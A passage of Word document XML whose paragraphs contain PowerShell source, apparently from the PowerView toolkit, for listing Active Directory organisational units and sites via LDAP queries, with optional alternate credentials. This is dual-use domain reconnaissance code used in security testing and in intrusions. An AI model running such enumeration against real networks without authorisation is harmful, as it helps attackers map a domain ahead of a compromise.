    <w:p w14:paraId="2AB7387F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $GUID,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FF23DF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="441003A5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35689E6B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099241AC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4AEE0BF2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294D200D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainController,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED36419" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5EB3D099" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33565C4B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ADSpath,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131F7381" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="389ECF91" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8DADE4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $FullData,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3954D0DB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="05DD30E9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateRange(1,10000)] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AA1BD6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Int]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FA9544" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $PageSize = 200,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393D3835" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7CA20F4F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Management.Automation.PSCredential]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70324388" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53559FBB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DDB55C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="52833787" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    begin {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF61D39" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        $OUSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $ADSpath -PageSize $PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CBCBC2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F547FDC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    process {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B9DF1B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if ($OUSearcher) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B0F3E4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if ($GUID) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F892693" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # if we're filtering for a GUID in .gplink</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B99D0CE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $OUSearcher.filter="(&amp;(objectCategory=organizationalUnit)(name=$OUName)(gplink=*$GUID*))"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EC7555" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485E1984" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D05BC69" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $OUSearcher.filter="(&amp;(objectCategory=organizationalUnit)(name=$OUName))"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4019F1B8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5AF710" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="42C4E4C6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1689501B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Results = $OUSearcher.FindAll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD2DCEC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Results | Where-Object {$_} | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30721DA8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if ($FullData) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E87A4B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        # convert/process the LDAP fields for each result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A854EF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $OU = Convert-LDAPProperty -Properties $_.Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CF0574" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $OU.PSObject.TypeNames.Add('PowerView.OU')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12110890" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $OU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3282327D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D7A566" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    else { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F1188A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        # otherwise just returning the ADS paths of the OUs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4741D8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $_.properties.adspath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB5E1E4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA7F3A5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3AD8AE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Results.dispose()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78977FF2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                $OUSearcher.dispose()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6714671D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C4BBA6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5F894C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Warning $_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E231914" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4385E065" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FE4B27" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1395BD16" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7283A505" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3F5EB238" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2EE7DC7F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function Get-NetSite {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1002B8ED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537D05D5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E559CE2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="35708882" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Gets a list of all current sites in a domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3931A730" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="40E7AC9C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER SiteName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D5C427" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2DD2B9BA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Site filter string, wildcards accepted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082BD8D5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="152A2911" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7621CF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="07FBB142" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The domain to query for sites, defaults to the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCBE726" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="726F8327" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B077404" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="27FA993E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain controller to reflect LDAP queries through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D5A68E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="466376EB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ADSpath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D5ED56" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="59FEDF85" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The LDAP source to search through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D1E515" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0C4E2276" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER GUID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8CB573" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2D19D98A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Only return site with the specified GUID in their gplink property.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BB5807" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="552CD6AA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER FullData</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34341498" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4D06E715" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Return full site objects instead of just object names (the default).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDBDEA2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="39F8A3B3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ACE25F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0D750FE9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The PageSize to set for the LDAP searcher object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF0165D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3B96DAE2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2557D590" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="35A8B766" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A [Management.Automation.PSCredential] object of alternate credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2490A5D7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        for connection to the target domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C36DE27" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3FF56F16" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B36E91" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0FA586C6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetSite -Domain testlab.local -FullData</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C300217" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CD13FB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns the full data objects for all sites in testlab.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E84660B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284B7004" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="71150FE2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500F476A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Param (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75338027" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        [Parameter(ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C83F6B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4435D166" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $SiteName = "*",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAF149D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5AB6ADB7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3327CA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8A2FD9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="365A6BE7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EA4F1D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainController,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E9EF57" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="518FB459" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110688B6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ADSpath,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B76171" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="10221627" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B89171" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $GUID,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B04329" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="120D750F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295068FD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $FullData,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD86FA8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="664026EB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateRange(1,10000)] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4621E9A0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Int]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0C7A51" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $PageSize = 200,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBD2B13" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="772A53D6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Management.Automation.PSCredential]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDF3413" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DD9624" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD5C9BA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6DA8DEED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    begin {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027D1BB1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        $SiteSearcher = Get-DomainSearcher -ADSpath $ADSpath -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSprefix "CN=Sites,CN=Configuration" -PageSize $PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149C16DE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4325F3A7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    process {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22013692" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
